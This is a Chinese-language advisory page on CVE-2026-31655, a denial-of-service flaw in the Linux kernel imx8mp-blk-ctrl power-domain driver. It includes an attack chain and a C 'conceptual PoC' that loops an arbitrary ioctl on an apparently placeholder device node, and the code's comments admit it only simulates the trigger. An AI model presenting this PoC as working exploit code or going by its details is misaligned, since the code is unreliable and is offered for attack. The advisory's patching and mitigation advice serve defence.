CVE-2026-31655 CVSS 5.5 中危

CVE-2026-31655: Linux内核imx8mp拒绝服务漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31655

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的imx8mp-blk-ctrl驱动程序存在一个安全漏洞。该漏洞源于NOC_HDCP时钟的管理逻辑不当，可能导致NoC（Network on Chip）ADB400端口在电源下掉握手期间发生挂起。由于该时钟在特定条件下被错误关闭，系统硬件逻辑可能陷入死锁，从而导致系统失去响应。攻击者需要具备本地低权限即可利用此漏洞，对系统可用性造成严重影响，但不会影响数据的机密性和完整性。

技术细节

该漏洞位于Linux内核的电源管理域驱动中，具体涉及NXP i.MX8M Plus SoC的块控制驱动。漏洞的根本原因是驱动程序允许NOC_HDCP时钟在NoC ADB400端口进行电源状态转换（如下电）之前被禁用。在SoC架构中，NoC负责不同处理单元间的数据通信，而ADB400端口的电源状态切换需要依赖特定的时钟信号来完成握手协议。如果NOC_HDCP时钟在此期间停止，握手过程将无法完成，导致硬件总线处于死锁或等待状态。由于攻击向量为本地（AV:L），攻击者可以通过执行特制的用户空间程序，触发相关的电源管理代码路径，进而导致系统内核挂起或崩溃，实现拒绝服务攻击。

攻击链分析

STEP 1

1. 本地访问

攻击者获取目标Linux系统的本地低权限用户访问权限。

STEP 2

2. 触发电源管理

攻击者运行特制的程序或脚本，调用内核接口触发imx8mp-blk-ctrl驱动的电源域状态切换逻辑。

STEP 3

3. 时钟关闭与握手失败

在电源状态切换过程中，NOC_HDCP时钟被禁用，导致NoC ADB400端口的电源下掉握手无法完成。

STEP 4

4. 系统挂起

硬件逻辑进入死锁状态，导致系统失去响应，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual PoC for CVE-2026-31655
 * This script attempts to trigger the power domain state transition
 * that may lead to the NOC hang on vulnerable i.MX8MP hardware.
 * Note: Actual exploitation requires specific hardware and kernel configuration.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define IMX8MP_BLK_CTRL_DEV "/dev/imx8mp-blk-ctrl"

int main() {
    int fd;
    printf("[+] Attempting to open %s\n", IMX8MP_BLK_CTRL_DEV);
    
    // Open the device node associated with the blk-ctrl driver
    fd = open(IMX8MP_BLK_CTRL_DEV, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Triggering power state toggle...\n");
    
    // In a real scenario, specific ioctl calls or sysfs writes 
    // would be used here to toggle the NOC_HDCP power domain.
    // This simulates the sequence that leads to the clock disable race condition.
    
    for (int i = 0; i < 10; i++) {
        // Simulate rapid power state requests
        ioctl(fd, 0x8001, NULL); 
        usleep(100000);
    }

    close(fd);
    printf("[+] Exploit attempt finished. System may hang if vulnerable.\n");
    return 0;
}

影响范围

Linux Kernel (imx8mp-blk-ctrl driver)

防御指南

临时缓解措施

建议立即应用Linux内核官方提供的修复补丁，该补丁通过保持NOC_HDCP时钟始终启用来防止握手挂起问题。在无法立即升级内核的情况下，应严格限制本地用户的执行权限，防止潜在攻击者触发该漏洞路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表